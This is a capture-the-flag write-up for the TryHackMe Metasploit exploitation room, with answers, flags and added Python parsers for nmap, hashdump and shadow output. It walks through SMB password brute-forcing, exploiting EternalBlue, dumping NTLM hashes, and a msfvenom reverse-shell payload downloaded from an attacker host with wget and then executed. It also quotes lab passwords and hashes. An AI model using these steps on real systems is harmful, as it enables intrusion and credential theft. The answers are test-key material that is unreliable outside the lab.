THM Metasploit: Exploitation - grunt92/IT-Sec-WriteUps GitHub Wiki
Introduction
Start the AttackBox and run Metasploit using the msfconsole command to follow along with this room.
No answer needed
Scanning
How many ports are open on the target system?
Run nmap -A -p- IP to get all open ports.
5
Using the relevant scanner, what NetBIOS name can you see?
Run sudo nmap -sV IP --script nbstat.nse -v. In the results you will get a list of names.
ACME IT SUPPORT
Note: You can also get the answer by running nmap -A -p- IP, but using specific scripts is something you should get used to.
What is running on port 8000?
webfs/1.21
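The scanning questions above all come down to reading nmap's output carefully (open port count, the service banner on a port, the NetBIOS name from the nbstat script). Below is an added example, not part of the original write-up, that parses nmap's XML output (the -oX form) to answer those three questions programmatically. The XML is a constructed sample that imitates nmap's layout; it is not a scan of the room's target, so its port count differs from the answer above.

```python
"""Parse nmap -oX output: count open ports, read service banners, and pull the
NetBIOS name from the nbstat host script. Added example with a constructed
sample scan (not output from the room's target)."""
import re
import xml.etree.ElementTree as ET

# Constructed sample in nmap's -oX layout; the host, ports and MAC are made up.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="7.6p1"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="8000"><state state="open"/><service name="http" product="webfs" version="1.21"/></port>
      <port protocol="tcp" portid="8080"><state state="closed"/><service name="http-proxy"/></port>
    </ports>
    <hostscript>
      <script id="nbstat" output="NetBIOS name: ACME IT SUPPORT, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 00:00:00:00:00:00 (unknown)"/>
    </hostscript>
  </host>
</nmaprun>
"""


def parse_ports(xml_text):
    """Return (port, protocol, state, banner) for every <port> element."""
    root = ET.fromstring(xml_text)
    results = []
    for port in root.iter("port"):
        state = port.find("state").get("state")
        svc = port.find("service")
        banner = ""
        if svc is not None:
            # Join product and version the way nmap prints them, e.g. "webfs/1.21";
            # fall back to the bare service name when no banner was fingerprinted.
            product = svc.get("product", "")
            version = svc.get("version", "")
            banner = "/".join(p for p in (product, version) if p) or svc.get("name", "")
        results.append((int(port.get("portid")), port.get("protocol"), state, banner))
    return results


def open_ports(xml_text):
    """Only ports nmap reported as open (closed/filtered are dropped)."""
    return [p for p in parse_ports(xml_text) if p[2] == "open"]


def service_on(xml_text, portid):
    """Banner for an open port, or None if the port is not open."""
    for port, _proto, state, banner in parse_ports(xml_text):
        if port == portid and state == "open":
            return banner
    return None


def netbios_name(xml_text):
    """Extract the NetBIOS name from the nbstat script output, if present."""
    root = ET.fromstring(xml_text)
    for script in root.iter("script"):
        if script.get("id") == "nbstat":
            m = re.search(r"NetBIOS name:\s*([^,]+)", script.get("output", ""))
            if m:
                return m.group(1).strip()
    return None


if __name__ == "__main__":
    ports = open_ports(SAMPLE_XML)
    print(f"{len(ports)} open ports: {[p[0] for p in ports]}")
    print("port 8000 runs:", service_on(SAMPLE_XML, 8000))
    print("NetBIOS name:", netbios_name(SAMPLE_XML))
```

To use it on a real scan, run nmap with -oX scan.xml and pass the file contents to the functions; the same parser works for the nbstat script because nmap stores script output in the script element's output attribute.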
What is the "penny" user's SMB password? Use the wordlist mentioned in the previous task.
Search for "smb_login" in Metasploit and use the module. Set RHOSTS to the target IP, set PASS_FILE to the path of the wordlist provided by THM and set SMBUSER to "penny". Run the module and you will get the answer.
leo1234
The Metasploit Database
No answer needed
No answer needed
Vulnerability Scanning
Who wrote the module that allows us to check SMTP servers for open relay?
Campbell Murray
Exploitation
Exploit one of the critical vulnerabilities on the target VM
No answer needed
What is the content of the flag.txt file?
Run nmap -A -p- IP. You will see that port 445 reveals the service pack: "Windows 7 Professional 7601 Service Pack 1 microsoft-ds". Researching that service pack leads you to the "EternalBlue" vulnerability. Search for "eternalblue" in Metasploit and select the first module.
Set RHOSTS to the IP of your target and, optionally, set SMBDomain to ".". Set your payload to "generic/shell_bind_tcp" and run the exploit.
Note: You can use other payloads for this task, but for me the shell_bind_tcp payload works best.
After the shell is established you can navigate to the file located at "/users/jon/Documents/flag.txt". Use more to read the flag.
THM-5455554845
What is the NTLM hash of the password of the user "pirate"?
To get the hash you have to use a hashdump module. Looking at the hashdump modules available for the target system (Windows), you will see that only modules requiring a Meterpreter session exist. Therefore you have to run the "EternalBlue" exploit with a Meterpreter payload. Once the exploit has run, background the session and use "search hashdump" to find the "post/windows/gather/hashdump" module. Set the session to the "EternalBlue" session and run the module. If it executes successfully you get the hashes, including the answer:
8ce9a3ebd1647fcc5e04025019f4b875
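The hashdump module prints one line per account in the form user:RID:LM-hash:NT-hash:::, and the value quoted above is the NT-hash field of the "pirate" line. From a defender's point of view, the same dump tells you whether the system still stores LAN Manager hashes, which accounts have an empty password, and which accounts share a password. The following is an added example, not code from the write-up, that parses such lines and reports those findings. The sample dump is constructed: the "pirate" NT hash is the one quoted above, while the RIDs, the other account names and the svc_backup LM hash are made up; the two "empty" constants are the well-known LM and NT hashes of an empty password.

```python
"""Audit the user:rid:lm:nt::: lines produced by a Windows hashdump for
LM storage, empty passwords and password reuse. Added example; the sample
dump is constructed apart from the "pirate" NT hash quoted in the write-up."""
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash stored when LM hashing is disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty string
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Constructed sample: RIDs, Guest/Administrator/svc_backup values and the
# svc_backup LM hash are made up; pirate's NT hash is the value from the room.
SAMPLE_DUMP = """\
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pirate:1000:aad3b435b51404eeaad3b435b51404ee:8ce9a3ebd1647fcc5e04025019f4b875:::
svc_backup:1001:0123456789abcdef0123456789abcdef:8ce9a3ebd1647fcc5e04025019f4b875:::
"""


def parse_hashdump(text):
    """Return a dict per well-formed hashdump line; status lines are skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue  # module chatter such as "[*] Dumping password hashes..."
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if not (rid.isdigit() and HEX32.match(lm) and HEX32.match(nt)):
            continue  # not a user:rid:lm:nt record
        entries.append({"user": user, "rid": int(rid), "lm": lm, "nt": nt})
    return entries


def audit(entries):
    """Return (user, finding) pairs a defender would act on."""
    findings = []
    seen_nt = {}  # NT hash -> first user seen with it, for reuse detection
    for e in entries:
        if e["lm"] != EMPTY_LM:
            # A real LM hash means the host still stores the weak LM form,
            # i.e. NoLMHash is off or the password predates that policy.
            findings.append((e["user"], "LM hash stored (LAN Manager hashing still enabled)"))
        if e["nt"] == EMPTY_NT:
            findings.append((e["user"], "empty password"))
            continue  # do not treat shared empty passwords as "reuse"
        if e["nt"] in seen_nt:
            findings.append((e["user"], f"same password as {seen_nt[e['nt']]}"))
        else:
            seen_nt[e["nt"]] = e["user"]
    return findings


if __name__ == "__main__":
    for user, finding in audit(parse_hashdump(SAMPLE_DUMP)):
        print(f"{user}: {finding}")
```

The reuse check compares NT hashes directly because NT hashes are unsalted: two accounts with the same password always produce the same hash, which is exactly why a dump like this is valuable to an attacker and why the finding matters to a defender.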
Msfvenom
Launch the VM attached to this task. The username is murphy, and the password is 1q2w3e4r. You can connect via SSH or launch this machine in the browser. Once on the terminal, type "sudo su" to get a root shell; this will make things easier.
No answer needed
Create a meterpreter payload in the .elf format (on the AttackBox, or your attacking machine of choice).
No answer needed
Transfer it to the target machine (you can start a Python web server on your attacking machine with the python3 -m http.server 9000 command and use wget http://ATTACKING_10.10.222.125:9000/shell.elf to download it to the target machine).
No answer needed
Get a meterpreter session on the target machine.
No answer needed
Use a post exploitation module to dump hashes of other users on the system.
No answer needed
What is the other user's password hash?
Follow the instructions provided by THM to generate a .elf file. Use python3 -m http.server PORT on your machine to start a web server. On the THM machine use sudo su to become root and then wget IP:PORT/rev_shell.elf to download the generated payload. Make the payload executable with chmod 777 rev_shell.elf. On your device start a listener in Metasploit: search for the "multi/handler" module, select the "linux/x86/meterpreter/reverse_tcp" payload, set LHOST and LPORT to the IP and port you specified while creating the payload, and start the handler. On the THM machine execute the payload with ./rev_shell.elf. After the reverse shell is established you can background the session, use search hashdump and then use linux/gather/hashdump to select the hashdump module. Set the session to the Meterpreter session and run the module to get the requested hashes.
$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0
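The value above is a crypt(3) string from /etc/shadow: the $6$ prefix selects sha512crypt, "Sy0NNIXw" is the salt and the remaining 86 characters are the digest. Reading that structure is useful on the defensive side too, because a shadow file can mix strong schemes with legacy md5crypt ($1$) or plain DES entries that should be rehashed. The following added example, which is not part of the write-up, parses crypt strings (sha512crypt, sha256crypt, md5crypt, bcrypt, yescrypt, traditional DES and locked entries) and audits shadow-style lines for weak schemes. The shadow lines are constructed except the murphy hash, which is the value quoted above; the date fields and the other accounts are made up.

```python
"""Classify the hashing scheme of /etc/shadow-style entries and flag weak
ones. Added example; sample lines are constructed apart from the murphy hash,
which is the value quoted in the write-up."""

# crypt(3) prefix -> scheme name (only schemes this parser understands)
SCHEMES = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
           "5": "sha256crypt", "6": "sha512crypt",
           "y": "yescrypt", "gy": "gost-yescrypt"}
WEAK = {"md5crypt", "descrypt"}  # fast, unsalted-by-modern-standards schemes

MURPHY_HASH = ("$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9"
               "EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0")

# Constructed shadow file: only murphy's hash is from the room.
SAMPLE_SHADOW = f"""\
root:!:19000:0:99999:7:::
murphy:{MURPHY_HASH}:19000:0:99999:7:::
legacy:$1$abcdefgh$ijklmnopqrstuvwxyz0123:19000:0:99999:7:::
ancient:ab0123456789A:19000:0:99999:7:::
svc:$y$j9T$abcdefghijklmnop$0123456789abcdefghijklmnopqrstuvwxyzABCDEF:19000:0:99999:7:::
"""


def parse_crypt(field):
    """Split a crypt(3) string into (scheme, params, salt, digest).

    Empty or '!'/'*'-prefixed fields are locked accounts; a field with no '$'
    is traditional DES crypt (2-char salt followed by an 11-char digest)."""
    if field == "" or field.startswith(("!", "*")):
        return ("locked", None, None, None)
    if not field.startswith("$"):
        return ("descrypt", None, field[:2], field[2:])
    parts = field.split("$")[1:]  # drop the empty string before the first '$'
    scheme = SCHEMES.get(parts[0], "unknown:" + parts[0])
    rest = parts[1:]
    params = None
    if scheme == "bcrypt":
        # $2b$cost$ then a 22-char salt and 31-char digest in a single field
        params = rest[0] if rest else None
        body = rest[1] if len(rest) > 1 else ""
        return (scheme, params, body[:22], body[22:])
    if rest and (rest[0].startswith("rounds=") or scheme in ("yescrypt", "gost-yescrypt")):
        # sha*crypt carry an optional rounds=N field; yescrypt always has a params field
        params, rest = rest[0], rest[1:]
    salt = rest[0] if rest else None
    digest = rest[1] if len(rest) > 1 else None
    return (scheme, params, salt, digest)


def audit_shadow(text):
    """Map each user to (scheme, note); the note is empty when nothing is wrong."""
    report = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue
        user, hash_field = fields[0], fields[1]
        scheme, _params, _salt, _digest = parse_crypt(hash_field)
        if scheme in WEAK:
            note = "weak scheme; rehash on next password change"
        elif scheme.startswith("unknown"):
            note = "unrecognised scheme; check manually"
        else:
            note = ""
        report[user] = (scheme, note)
    return report


if __name__ == "__main__":
    print(parse_crypt(MURPHY_HASH)[:3])
    for user, (scheme, note) in audit_shadow(SAMPLE_SHADOW).items():
        print(f"{user:8} {scheme:12} {note}")
```

Note that the parser only identifies the scheme and splits the fields; it does not attempt to verify or crack anything. The rehash recommendation works because PAM replaces the stored hash with the current default scheme the next time the user changes their password.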
Summary
No answer needed
No answer needed